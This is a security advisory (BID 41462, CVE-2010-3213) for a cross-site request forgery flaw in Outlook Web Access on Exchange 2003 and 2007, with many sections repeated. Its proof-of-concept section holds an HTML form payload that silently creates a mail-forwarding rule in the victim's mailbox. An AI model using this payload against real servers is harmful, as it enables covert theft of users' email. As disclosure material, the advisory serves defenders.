Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
BID:41462
Info
Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
| Bugtraq ID: | 41462 |
| Class: | Design Error |
| CVE: |
CVE-2010-3213 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 08 2010 12:00AM |
| Updated: | Jun 05 2019 11:00AM |
| Credit: | Rosario Valotta |
| Vulnerable: |
Microsoft Exchange Server 2007 SP2 Microsoft Exchange Server 2007 SP 1 Microsoft Exchange Server 2007 0 Microsoft Exchange Server 2003 SP2 Microsoft Exchange Server 2003 SP1 Microsoft Exchange Server 2003 SP1 Microsoft Exchange Server 2003 |
| Not Vulnerable: |
Microsoft Exchange Server 2007 SP3 |
Discussion
Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
Microsoft Exchange Server Outlook Web Access is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Microsoft Exchange Server 2007 versions prior to Service Pack 3 are reported to be vulnerable.
Microsoft Exchange Server Outlook Web Access is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Microsoft Exchange Server 2007 versions prior to Service Pack 3 are reported to be vulnerable.
Exploit / POC
Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim into visiting a malicious webpage.
The following example request is available:
<form name="myform" method="post" enctype="text/plain" action=https://www.example.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name='&#60params&#62&#60Id&#62&#60/Id&#62&#60Name&#62Test&#60/Name&#62&#60RecpA4&#62&#60item&#62&#60Rcp DN="[email protected]" EM="[email protected]" RT="SMTP" AO="3"&#62&#60/Rcp&#62&#60/item&#62&#60/RecpA4&#62&#60Actions&#62&#60item&#62&#60rca t="4"&#62&#60/rca&#62&#60/item&#62&#60/Actions&#62&#60/params&#62' value="">
</form>
To exploit this issue, an attacker must entice an unsuspecting victim into visiting a malicious webpage.
The following example request is available:
<form name="myform" method="post" enctype="text/plain" action=https://www.example.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name='&#60params&#62&#60Id&#62&#60/Id&#62&#60Name&#62Test&#60/Name&#62&#60RecpA4&#62&#60item&#62&#60Rcp DN="[email protected]" EM="[email protected]" RT="SMTP" AO="3"&#62&#60/Rcp&#62&#60/item&#62&#60/RecpA4&#62&#60Actions&#62&#60item&#62&#60rca t="4"&#62&#60/rca&#62&#60/item&#62&#60/Actions&#62&#60/params&#62' value="">
</form>
Solution / Fix
Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
Solution:
This issue does not affect Exchange Server 2007 SP3 and later. Users are advised to upgrade to a non-affected version.
Solution:
This issue does not affect Exchange Server 2007 SP3 and later. Users are advised to upgrade to a non-affected version.
References
Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability
References:
References:
- Exchange Server Home Page (Microsoft)
- Pwning corporate webmails (Rosario Valotta)
- Microsoft Security Advisory (2401593) (Microsoft)